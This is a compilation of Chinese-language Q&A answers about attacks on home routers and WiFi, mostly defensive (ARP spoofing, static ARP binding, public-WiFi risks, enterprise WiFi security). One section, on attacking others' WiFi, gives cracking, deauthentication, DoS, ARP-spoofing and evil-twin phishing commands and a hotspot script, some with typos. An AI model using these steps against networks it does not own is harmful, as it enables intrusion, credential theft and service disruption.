① 家用路由器會遭受攻擊嗎
家用路由器說實話,不會設置的話,任憑裝寬頻的師傅隨便設置一通,很容易被入侵!最大的危害就是劫持域名,篡改一堆亂七八糟的東西,容易導致賬號密碼或者隱私泄露!當然了,真正的黑客肯定是沒工夫侵入個人或者家用路由器等設備,一般就是惡意網站上的木馬程序或者人為猜測的方式獲取路由器管理賬號密碼進行攻擊的!
會遭到攻擊,目前國內對家用路由器最大的攻擊傷害來自於一個APP,叫做萬能鑰匙,只要你用萬能鑰匙,你連接過的所有網路就都會被分享出去。
會的,普通家庭設置安全級別太低,也沒有防範意識,很容易被黑客入侵控制,但是基本沒有經濟風險,但是一般黑客不會干擾你的正常使用,說白了,普通家庭的路由器對於黑客來說沒有什麼價值,除非很多很多,前幾年有一起震驚世界的美國網路攻擊事件,就是由數百萬路由器,智能家居設備被黑客控制用來攻擊目標造成的破壞威力相當恐怖。那些被控制的業主還渾然不知。這個江湖離普通人太遠,沒必要擔心,或者說擔心也沒用,道高一尺魔高一丈。
簡單說下,不考慮別的原因(例如路由器管理員賬號密碼弱口令,wifi密碼被泄露等等),一般情況下不會被直接攻擊,因為大多數路由器都沒有公網IP地址(部分擁有公網IP地址的除外),都是通過nat方式透過網關來上網。
打個比方理解下,把數據包比作快件,快遞員不知道你的詳細地址,只知道你在哪個小區,快遞只能先被送到了小區門衛那裡,門衛知道你住小區幾號樓幾單元xxxx房號,就由他再送到家為止。門衛還可以把那些危險的數據包請求擋在小區門外不讓他們進來。(只是簡單打比方便於理解,現實中小區門衛不負責送快遞,請勿深層聯想……)
不會的
② 無線網遭受攻擊這是什麼意思
你的路由器被攻擊了,應該是區域網里有設備比如電腦中毒了,先把網路斷了把你連上路由器的設備都殺毒下,路由器換個密碼,重置下再換也行,也可以連上路由器再把可疑的設備的mac禁了。
ARP攻擊就是有設備偽裝網關從而對你進行斷網攻擊或竊取信息,防禦沒太大效果特別是網速影響大,把攻擊者從區域網里清掉是最好的
③ wifi路由器遭到ARP攻擊怎麼解決
arp攻擊是指在同一個區域網里,出現兩個沖突的ip地址,可在無線路由器設置靜態arp綁定即可。
操作參考如下(具體操作詳見具體型號路由器):
登陸進入無線路由器管理者後台(登陸ip和賬號密碼,默認值可通過路由器背面查詢);
記錄手機、電腦、平板等電子設備的mac地址,平板或手機可通過進入wifi高級處查詢到,電腦可通過命令運行符輸入ipconfig/all查詢到;
無線路由器管理者後台點擊左側的ip和mac地址綁定
—
靜態arp綁定設置;
添加單個新條目
—
輸入要綁定的ip和mac地址
—
確定;
點擊使所有條目生效
—
再啟用即可。
④ 無線網路遭受攻擊什麼情況
你的路由器被攻擊了,應該是區域網里有設備比如電腦中毒了,先把網路斷了把你連上路由器的設備都殺毒下,路由器換個密碼,重置下再換也行,也可以連上路由器再把可疑的設備的mac禁了。
ARP攻擊就是有設備偽裝網關從而對你進行斷網攻擊或竊取信息,防禦沒太大效果特別是網速影響大,把攻擊者從區域網里清掉是最好的
⑤ 手機最近老是提示無線網路被攻擊,存在支付風險,要求斷開
您好,親愛的管家用戶
尊敬的用戶,手機管家提示ARP攻擊是一種常見的WiFi網路風險,是由於您所接入的WiFi網路中同時其他黑客接入並且進行ARP攻擊,有可能竊取您在上網過程中的數據傳輸和賬號密碼信息。
若此時手機仍舊無法上網,若是家中的路由器,建議您可登錄路由器管理界面,在靜態ARP映射中綁定MAC地址,並建議更換路由器默認管理員用戶名和密碼,再重啟路由器看看。
1、點擊「設定」,就是跟齒輪一樣的圖標。
展開長圖
2/6
2、點擊「WLAN」選項。
展開長圖
3/6
3、點擊自己連接的網路,一般是第一個
展開長圖
4/6
4,點擊菜單鍵(我的手機菜單鍵是在手機的左下角位置),選擇「高級設定「選項。
展開長圖
5/6
5、點擊「睡眠時間保持WLAN開啟「,選擇「總是「選項。
查看剩餘1張圖
6/6
6、點擊「設置網路連接方法「,選擇「自動「,會跳出提示框,點擊確定就行了。
查看剩餘1張圖
⑥ 黑客如何攻擊公共wifi
我國公共場所免費WiFi不斷增多,然而,由於免費WiFi存在路由器和網路漏洞,成為黑客攻擊的對象,導致網民個人隱私泄露、網銀被盜等案例時有發生。
黑客攻擊公共WiFi最常用三大招式:
1.域名劫持。
在公共的WiFi環境下,進入無線路由器的管理後台,並對域名系統進行修改。當使用者輸入網址時,伺服器直接把IP跳到黑客設置的釣魚網站。
2.釣魚WiFi。
黑客往往選擇在繁華商業區構建一個不加密的WiFi,並把WiFi的名字起一個眾所周知的熱點名稱,引誘網民「上鉤」。
3.ARP(地址解析協議)欺騙。
黑客和使用者同時連接了同一個WiFi,使用者開始上網瀏覽,黑客則在其手機上打開了一款黑客軟體。該黑客軟體很快就進入路由器的WEB管理界面,並將使用者的手機信息讀取出來。
如何防範信息泄露:
一是不要盲目地「見網就連」,防止釣魚的虛假WiFi。
二是不要使用公共WiFi進行網購和網銀操作,避免個人信息的泄露。當用戶發現賬戶被劫持後,應在第一時間退出賬戶,隨後退出WiFi。如果直接退網而不先退出賬戶,緩存的網路數據則不會被清空,將導致黑客可以繼續操控用戶。
⑦ 怎麼攻擊別人wifi
1.保密性
我們攻擊WIFI的第一個思路就是從保密性出發,我們希望從無線系統中獲取用戶的明文數據。首先,我們知道WIFI的的認證加密主要有以下四種方式:OPEN(無加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI沒有採取認證加密措施,任意用戶均可鏈接WIFI,用戶數據在BSS(基本服務集)中明文傳輸,惡意用戶沒有任何門檻就可連接,然後通過中間人攻擊即可獲取用戶的數據(SSL、SSH等需要其他工具)。如下圖所示:
WEP、WPA、WPA2認證加密模式的WIFI需要破解獲取密碼,然後通過中間人或直接嗅探的方式獲取用戶明文數據。步驟就不詳述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airomp-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕獲ivs數據包
aireplay-ng -3 -b 目標AP的MAC -h 某一個連接該AP的station的MAC wlan1mon #發送ARP包獲取加速獲取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airomp-ng -w /workspace/sniff/airmon-wpa2 --bssid 目標AP的MAC -c AP所在chanle wlan1mon #嗅探無線數據,抓取handshake包
aireplay-ng -0 5 -a 目標AP的MAC -c 某一連接AP的station的MAC wlan1mon #發送deauth包,更快的獲取handshake
aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密碼
密碼破解成功後即可連接AP,通過中間人的方式獲取用戶明文數據,或者直接用wireshark抓取加密包,然後通過airdecap-ng工具解密,然後用wireshark讀取已經解密的數據包。
破解WPA、WPA2不一定成功,取決於你字典是否強大,此時我們可以想辦法誘騙用戶主動輸入WIFI密碼,比如我們創建一個和目標AP具有同樣ESSID的軟AP,用戶可以連接上,單在瀏覽網頁時會彈出一個虛假的認證頁面,告訴用戶必須輸入WIFI的密碼,用戶只要輸入密碼我們即可獲取。可以利用fluxion、wifiphisher等工具實現。
wifiphisher將用戶輸入的密碼當做WIFI的密碼,但此密碼並沒有去驗證,如果用戶輸入錯誤,也會提示出該密碼。
而fluxion會將用戶輸入的密碼與handshake校驗,成功方認為獲取到密碼。
2.可用性
通過使目標用戶無法使用WIFI來破壞無線系統的可用性,通常通過DOS攻擊來實現,比如發送大量的deauth包來迫使用戶station與AP解除認證、連接。
aireplay -0 100 -a 目標AP的MAC -c攻擊的station的MAC wlan1mon #發送大量的deauth包,迫使目標station無法連接AP
mdk3 wlan1mon a -a 攻擊AP的MAC #mdk3可以偽造大量的station與AP連接,從而耗盡AP的資源造成DOS攻擊
3.真實性
(1)惡意用戶進入無線系統後,可通過中間人攻擊獲取或修改用戶數據。
ARP欺騙或DNS欺騙,ettercap工具非常方便。下面採用mitmf工具通過ARP欺騙將目標瀏覽網頁中的所有圖片上下顛倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通過driftnet工具抓取目標瀏覽網頁時的圖片
driftnet -i wlan0
當然還可以利用中間人攻擊做很多事情,比如獲取cookie,嵌入js,結合beef進一步攻擊等等。。。
(2)偽造AP進行釣魚攻擊
airbase -ng -e airmon wlan1mon #創建釣魚熱點
然後通過下面的腳本開啟dhcp伺服器(必須先安裝isc-dhcp-server),開啟路由,開啟系統轉發,開啟防火牆nat等。
1 #!/bin/bash 2 3 echo '配置釣魚熱點...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待啟動dhcp伺服器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此時用戶可以不用密碼即可連接airmon熱點,並可以上網,但此時可以通過嗅探at0網卡獲取用戶數據。
4.完整性
篡改用戶數據,在WIFI攻擊這塊貌似用處不大。
5.不可抵賴性
⑧ wiFi遭到ARp攻擊,是什麼原因
由於區域網的網路流通不是根據IP地址進行,而是根據MAC地址進行傳輸。所以,MAC地址在A上被偽造成一個不存在的MAC地址,這樣就會導致網路不通,A不能Ping通C!這就是一個簡單的ARP欺騙。
情況一、當區域網內某台主機感染了ARP病毒時,會向本區域網內(指某一網段,比如:10.10.75.0這一段)所有主機發送ARP欺騙攻擊謊稱自己是這個網端的網關設備,讓原本流向網關的流量改道流向病毒主機,造成受害者不能正常上網。
情況二、區域網內有某些用戶使用了ARP欺騙程序(如:網路執法官,QQ盜號軟體等)發送ARP欺騙數據包,致使被攻擊的電腦出現突然不能上網,過一段時間又能上網,反復掉線的現象。
⑨ 由無線網路引發的內網入侵
Author: qingxp9
前幾日,一條關於"前員工入侵富士康網路:瘋狂洗白iPhone獲利300萬"的新聞刷爆了網路。員工通過在富士康內部秘密安裝無線路由器的方式侵入了蘋果公司的網路,通過為他人「改機、解鎖」手機共9000餘部,五個月違法所得共計300餘萬元。
這是一個利用企業無線網路達成入侵內網的典型案例。近年來,因無線網路導致的安全事件已經逐漸佔領了新聞的頭條,在某漏洞平台檢索時發現僅2015年便發生了數十起知名企業因WiFi相關安全問題導致內網被入侵的事件,對企業造成了十分惡劣的影響。
我們簡單回顧一下:
到了2016年,無線網路已經成為了企業移動化辦公的重要基礎設施。由於普遍缺乏有效的管理,無線網路也越來越多的成為黑客入侵企業內網的突破口。
回到開頭提到的富士康iphone刷機解鎖事件,通過新聞描述便可大致了解到整個攻擊過程:
攻擊者通過組合使用私接路由器和無線網橋的手法,可以將針對企業內網攻擊的實施范圍擴大到難以想像的幾十公里,極大增強了攻擊的隱秘性,這種攻擊手段值得警惕。
從天巡實驗室長期的測試和對無線網路安全防護的數據和經驗看,WiFi密碼泄漏、釣魚WiFi、私搭亂建WiFi成為目前企業WiFi網路的三大安全隱患。
1、密碼泄漏
WiFi密碼泄漏主要有以下4個方面的原因:
就現階段而言,WiFi密碼被不當分享的問題,已經成為了企業WiFi網路所面臨的最為首要的安全性問題。這主要是因為:考慮到成本和實施復雜度,家庭和小型企業都會選擇採用WPA-PSK加密方案,特點便是所有人使用相同的密碼。家用WiFi網路的使用者一般為3-5人,而企業WiFi網路往往有數十人,甚至成百上千多的人在同時使用,只要有一個人不慎將密碼分享了出來,密碼也就不再是秘密了。
某些第三方WiFi密碼分享平台的產品邏輯也進一步加劇了企業WiFi密碼被「意外分享」的節奏。比如,2015年初,媒體廣泛報道了某個知名的第三方WiFi密碼分享工具可能造成用戶信息泄漏的新聞。報道顯示,該產品在用戶安裝後,會默認勾選「自動分享熱點」選項。使用該軟體的近億用戶一旦接入任何企業的WiFi網路,都會自動的把企業的WiFi密碼分享出去,而這一過程企業網管幾乎完全無法控制和阻止。
2、員工私搭亂建WiFi給企業網路帶來安全隱患
在WiFi技術流行以前,企業內網中的電腦都是通過有線方式進行連接的,企業網路的拓撲結構和網路邊界通常也是固定的。但是,自從WiFi技術普及以來,企業的內網邊界正在變得越來越模糊。特別是私搭亂建的WiFi網路,給企業的內網安全造成了極大的隱患。
一般來說,企業員工私搭亂建WiFi網路主要有以下幾種形式:
私搭亂建的WiFi網路實際上是在那些已經得到准入授權的設備上開放了一個新的入口,使得那些未經授權的設備可以通過這個入口不受限制的接入內網系統,而且管理員往往很難發現。
3、釣魚WiFi是黑客入侵企業網路的重要途徑
2015年央視315晚會上,安全專家現場演示了釣魚WiFi的工作過程。在晚會現場,觀眾加入主辦方指定的一個WiFi網路後,用戶手機上正在使用哪些軟體、用戶通過微信朋友圈瀏覽的照片等信息就都被顯示在了大屏幕上。不僅如此,現場大屏幕上還展示了很多用戶的電子郵箱信息
⑩ 在連接別人Wifi時 被斷網攻擊了怎麼辦
電腦受到arp斷網攻擊原因:
1、電腦中了ARP病毒,這種感覺病毒傳播速度很快,一般區域網內有一台中毒,其它也很難倖免,所以要找到ARP攻擊主機!如果有一天電腦老掉線或極慢,就要考慮電腦是否也感染了病毒,
2、區域網內內有人使用了類似P2P技術的軟體,來搶了流量,這個問題就要找用一根網線的用戶談談了。
建議解決方法:
開啟系統自帶的防火牆,其實系統自帶的防火牆也能應付一般性ARP攻擊的!但很少人用。首先點擊開始菜單,進入控制面板。
2在控制面板頁面選擇「系統與安全「」選項進入。
3 在系統與安全界面選擇進入windows防火牆下面的檢查防火牆狀態。
4 在windows防火牆狀態頁面,點擊右側菜單的」打開或關閉windows防火牆「
5 在開關防火牆頁面,將所有網路環境下的防火牆開啟。。